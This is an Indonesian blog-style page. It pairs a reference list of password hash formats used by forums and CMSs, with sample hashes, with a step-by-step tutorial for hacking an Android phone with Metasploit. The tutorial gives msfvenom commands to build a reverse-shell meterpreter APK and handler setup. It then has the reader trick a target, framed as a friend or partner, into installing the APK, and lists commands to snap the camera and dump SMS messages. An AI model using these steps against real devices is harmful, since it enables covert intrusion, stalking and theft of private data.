[+] Contoh : *E6CC90B878B948C35E92B003C792C46C58C4AF40
[+] Catatan : Hash harus dimuat ke program tanpa tanda bintang (*) yang terdapat di awal setiap hash.
9. RAdmin v2.x
[+] Digunakan di Aplikasi Remote Administrator v2.x.
[+] Panjang : 16 bytes.
[+] Algorithm : Password diisi dengan nol dengan panjang 100 bytes, kemudian seluruh string dihash dengan algoritma MD5.
[+] Contoh : 5e32cceaafed5cc80866737dfb212d7f
10. MD5
[+] Digunakan di phpBB v2.x, Joomla versi di bawah 1.0.13 dan banyak forum dan CMS.
[+] Panjang : 16 bytes.
[+] Algorithm : sama seperti fungsi md5() di php.
[+] Contoh : c4ca4238a0b923820dcc509a6f75849b
11. md5($pass.$salt)
[+] Digunakan di WB News, Joomla Versi 1.0.13 keatas.
[+] Panjang : 16 bytes
[+] contoh : 6f04f0d75f6870858bae14ac0b6d9f73:1234
12. md5($salt.$pass)
[+] Digunakan di osCommerce, AEF, Gallery dan beberapa CMS.
[+] Panjang : 16 bytes.
[+] Contoh : f190ce9ac8445d249747cab7be43f7d5:12
13. md5(md5($pass))
[+] Digunakan di e107, DLE, AVE, Diferior, Koobi dan beberapa CMS.
[+] Panjang : 16 bytes.
[+] Contoh : 28c8edde3d61a0411511d3b1866f0636
14. md5(md5($pass).$salt)
[+] Digunakan di vBulletin, IceBB.
[+] Panjang ; 16 bytes.
[+] Contoh : 6011527690eddca23580955c216b1fd2:wQ6
15. md5(md5($salt).md5($pass))
[+] Digunakan di IPB.
[+] Panjang : 16 bytes.
[+] Contoh : 81f87275dd805aa018df8befe09fe9f8:wH6_S
16. md5(md5($salt).$pass)
[+] Digunakan di MyBB.
[+] Panjang : 16 bytes.
[+] Contoh : 816a14db44578f516cbaef25bd8d8296:1234
17. md5($salt.$pass.$salt)
[+] Digunakan di TBDev.
[+] Panjang : 16 bytes.
[+] Contoh : a3bc9e11fddf4fef4deea11e33668eab:1234
18. md5($salt.md5($salt.$pass))
[+] Digunakan di DLP.
[+] Panjang : 16 bytes.
[+] Contoh : 1d715e52285e5a6b546e442792652c8a:1234
20. SHA-1[+] Digunakan dibanyak Forum dan CMS.
[+] Panjang : 20 bytes
[+] Algorithm: Sama dengan sha1() fungsi di PHP.
[+] Contoh : 356a192b7913b04c54574d18c28d46e6395428ab
21. sha1(strtolower($username).$pass)
[+] Digunakan di SMF
[+] Panjang : 20 bytes.
[+] Contoh : Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
22. sha1($salt.sha1($salt.sha1($pass)))
[+] Digunakan di Woltlab BB
[+] Panjang : 20 bytes
[+] Contoh : cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234
23. SHA-256(Unix)
[+] Digunakan di Linux dan sejenisnya.
[+] Panjang : 55 Karakter.
[+] Deskripsi : Hash dimulai dengan tanda $5$, kemudian diikuti salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian dilanjutkan dengan satu karakter lagi $, kemudian diikuti hash sebenarnya.
[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma SHA-256 5000 kali.
[+] Contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi...
24. SHA-512(Unix)
[+] Digunakan di Linux dan sejenisnya.
[+] Panjang : 98 Karakter.
[+] Deskripsi : Hash dimulai dengan tanda $6$, kemudian diikuti dengan salt (sampai dengan 8 karakter acak, dicontoh kita saltnya adalah string "12345678"), kemudian dilanjutkan dengan satu karakter lagi $, kemudian diikuti hash sebenarnya.
[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma SHA-512 5000 kali.
[+] contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm

Hack Android Menggunakan Metasploit Kali Linux


Hello sob, kali ini ane mau bahas gimana cara nya menyusup ke android teman atau pacar sobbat melalui metasploid framework, jika ini berhasil sobat bisa mengontrol android secara penuh, semua data yang ada pada android bisa sobat liat, bahkan sobat bisa melihat aktifitas pemilik android melalui camera android nya, wow enak yee, nih sangat cocok buat sobat-sobat yang suka kepo, ama temen atau pacar nya. hehehe bercanda sob, oke lah dipercepat aja, kita  langsung ke step by step nya.


     Pertama sobat buka new terminal di kali linux untuk membuat file.apk yang nanti nya akan kita jadikan senjata untuk menyerang si target,
ketikan command berikut ini :

root@kali : -# msfvenom -platfrom android -p android/meterpreter/reverse_tcp lhost=(IP sobat)  iport=( 334 atau 3333 atau 4444 ) R > /root/Desktop/hack.apk




Nah setelah proses ini sobat akan melihat file hack.apk di Decktop, itu tanda nya file sukses di buat. lihat gambar dibawah :


Selanjutnya ketikan command berikut :

root@kali : -# msfconsole


Nah berikut command yang digunakan untuk exploitnya

msf > use exploit/multi/handler
msf exploit (handler) > set payload android/meterpreter/reverse_tcp
msf exploit (handler) > set lhost ( isikan IP sobat )
msf exploit (handler) > set lport 3333
msf exploit (handler) > exploit


Oke sob, sampai tahap ini sobat harus kirim file apk tadi ke android target, pinter-pinter nya sobat aja gimana caranya file apk yg sobat buat bisa nyampe ke android target, dan si target mau membuka nya, jika belom dibuka oleh target tampilan nya akan seperti gambar dibawah ini.


Disini ane coba pakek android ane sendiri hehehe, nama nya juga buat pembelajaran aja, nah klo udh terconnect dengan android tampilan nya akan jadi seperti ini 


ketikan "ps" untuk melihat proses list yang berjalan di android
              "webcam_list" untuk melihat aktifitas target 
              "webcam_snap -i 1" untuk back camera
              "webcam_snap -i 2" untul front camera
              "cd atau is" untuk melihat media android si target
              "dump_sms" untuk melihat sms


      Selesai dah sob, sebenernya masih banya lagi, buat lebih detail nya cari sendiri yah, ane cuma menuntun ampe tahap itu aja. oke lah sob mari kita akhiri tutor ini, apabila ada kata yang kurang berkehendak tolong di maafkan,dan ane mengucapkan terima kasih atas kunjungan sobat-sobat sekalian.


     Selamat mencoba dan semoga berhasil 



Tanks to

  • Kali linux
  • developer kali linux